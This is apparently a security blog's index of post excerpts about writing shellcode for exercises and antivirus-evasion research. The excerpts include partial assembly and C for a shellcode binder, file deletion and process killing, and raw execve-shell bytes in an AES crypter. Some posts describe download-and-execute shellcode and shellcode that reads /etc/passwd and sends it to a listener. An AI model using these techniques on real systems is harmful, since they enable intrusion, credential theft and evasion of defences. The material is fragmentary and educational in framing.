danielsauder

Shellcode Here is a shellcode that might run on most windows machines. I adopted code from here: http://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html so thanks to the author of that shellcode. Instead of CreateProcess I use WinExec in this example. ; Filename: winexec.asm ; Author: Daniel Sauder ; Website: https://govolution.wordpress.com/ ; License: http://creativecommons.org/licenses/by-sa/3.0/ BITS 32 global _start _start: xor ebx,…

Here are the slides from my talk at the Deepsec 2014 conference: https://deepsec.net/docs/Slides/2014/Why_Antivirus_Fails_-_Daniel_Sauder.pdf

I did not find a shellcode binder for Windows 64 bit systems, so here is my version: #include <windows.h> unsigned char sc[] = // your shellcode here typedef void (*FUNCPTR)(); int main(int argc, char **argv) { FUNCPTR func; int len; DWORD oldProtect; len = sizeof(sc); if (0 == VirtualProtect(&sc, len, PAGE_EXECUTE_READWRITE, &oldProtect)) return 1; func…

So here is just a very short one. Always when I have to set up a new pentest machine, I have to look it up again, so here is a small list of browser addons that are usefull for webapp pentesting: Wappalyzer Hackbar Firebug FoxyProxy Export Cookies ProfileSwitcher Web Developer Toolbar GroundSpeed Tamper Data ImmuniWeb

Check out my article about antivirus evasion here.

Just a short one here. This shellcode simply deletes a file with the name x. Have fun. deletefile.nasm ; Filename: deletefile.nasm ; Author: Daniel Sauder ; Website: https://govolution.wordpress.com ; Tested on: Ubuntu 12.04 / 32Bit ; License http://creativecommons.org/licenses/by-sa/3.0/ ; delete file with name x section .text global _start _start: push 0x78 ; push x, filename…

After completing the tasks for the SLEA certification, I went on writing a shellcode for downloading and executing a file. For this task I wanna use wget with execve. But first, some pseudocode: start execve wget file_x chmod +x file_x execve file_x end So that is the plan. See a problem here? Look at the…

Because it is so much fun I developed a shellcode, that reads /etc/passwd and then sends the content to 127.1.1.1 port 12345. And here it is: shellcode.c /* ; Author: Daniel Sauder ; Website: https://govolution.wordpress.com/about ; License http://creativecommons.org/licenses/by-sa/3.0/ ; Shellcode reads /etc/passwd and sends the content to 127.1.1.1 port 12345. ; The file can be…

This is the last one and it is about writing a crypter/decrypter. I used python and pycrypto for this task. The execve shellcode starts a shell. The scripts use AES for encryption and decryption. Here is the code for encryption: encode.py from Crypto.Cipher import AES plain=("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80") obj=AES.new(‘Passphrase123456’, AES.MODE_CBC, ‘IVIVIVIVIVI12345’) l=len(plain) r=l%16 p=16-r print "offset: "…

This assignment is about writing polymorphic versions of shellcodes downloaded by shell-storm.org. Kill all Processes Shellcode I want to start with a simple one, a shellcode for killing processes which can be found at http://www.shell-storm.org/shellcode/files/shellcode-212.php. Here is the original assembler code: killall_orig.nasm section .text global _start _start: ; kill(-1, SIGKILL) push byte 37 pop eax…